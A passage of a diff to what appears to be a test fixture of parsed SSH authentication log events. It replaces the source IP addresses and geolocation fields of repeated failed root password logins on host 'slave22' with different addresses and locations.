-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1786,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -155,22 +147,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1786,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -202,7 +190,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 618,
-        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2738,
         "related.hosts": [
@@ -236,7 +224,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 842,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2742,
         "related.hosts": [
@@ -289,22 +277,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3576,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -355,22 +339,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3576,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -421,22 +401,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3576,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -487,22 +463,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3576,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -553,22 +525,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3576,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -600,7 +568,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 2141,
-        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2742,
         "related.hosts": [
@@ -634,7 +602,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 2365,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2754,
         "related.hosts": [
@@ -672,7 +640,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 2628,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root",
         "process.name": "sshd",
         "process.pid": 2758,
         "related.hosts": [
@@ -725,22 +693,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -791,22 +755,22 @@
             "slave22"
         ],
         "related.ip": [
-            "116.31.116.27"
+            "216.160.83.58"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 134764,
-        "source.as.organization.name": "CHINANET Guangdong province network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "116.31.116.27",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.58",
         "source.port": 26714,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -857,22 +821,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -923,22 +883,22 @@
             "slave22"
         ],
         "related.ip": [
-            "116.31.116.27"
+            "216.160.83.58"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 134764,
-        "source.as.organization.name": "CHINANET Guangdong province network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "116.31.116.27",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.58",
         "source.port": 26714,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -989,22 +949,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1055,22 +1011,22 @@
             "slave22"
         ],
         "related.ip": [
-            "116.31.116.27"
+            "216.160.83.58"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 134764,
-        "source.as.organization.name": "CHINANET Guangdong province network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "116.31.116.27",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.58",
         "source.port": 26714,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1085,7 +1041,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 4028,
-        "message": "Received disconnect from 116.31.116.27: 11:  [preauth]",
+        "message": "Received disconnect from 216.160.83.58: 11:  [preauth]",
         "process.name": "sshd",
         "process.pid": 2758,
         "related.hosts": [
@@ -1102,7 +1058,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 4119,
-        "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root",
+        "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root",
         "process.name": "sshd",
         "process.pid": 2758,
         "related.hosts": [
@@ -1134,22 +1090,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1200,22 +1152,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1247,7 +1195,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 4668,
-        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2754,
         "related.hosts": [
@@ -1281,7 +1229,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 4892,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2762,
         "related.hosts": [
@@ -1334,22 +1282,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1605,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1400,22 +1344,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1605,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1466,22 +1406,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1605,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1532,22 +1468,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1605,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1598,22 +1530,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1605,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1645,7 +1573,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 6191,
-        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2762,
         "related.hosts": [
@@ -1679,7 +1607,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 6415,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2766,
         "related.hosts": [
@@ -1732,22 +1660,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1166,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1798,22 +1722,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1166,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1864,22 +1784,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1166,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1930,22 +1846,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1166,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -1996,22 +1908,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1166,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2043,7 +1951,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 7714,
-        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2766,
         "related.hosts": [
@@ -2077,7 +1985,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 7938,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root",
         "process.name": "sshd",
         "process.pid": 2778,
         "related.hosts": [
@@ -2130,22 +2038,22 @@
             "slave22"
         ],
         "related.ip": [
-            "116.31.116.27"
+            "216.160.83.58"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 134764,
-        "source.as.organization.name": "CHINANET Guangdong province network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "116.31.116.27",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.58",
         "source.port": 13996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2196,22 +2104,22 @@
             "slave22"
         ],
         "related.ip": [
-            "116.31.116.27"
+            "216.160.83.58"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 134764,
-        "source.as.organization.name": "CHINANET Guangdong province network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "116.31.116.27",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.58",
         "source.port": 13996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2262,22 +2170,22 @@
             "slave22"
         ],
         "related.ip": [
-            "116.31.116.27"
+            "216.160.83.58"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 134764,
-        "source.as.organization.name": "CHINANET Guangdong province network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "116.31.116.27",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
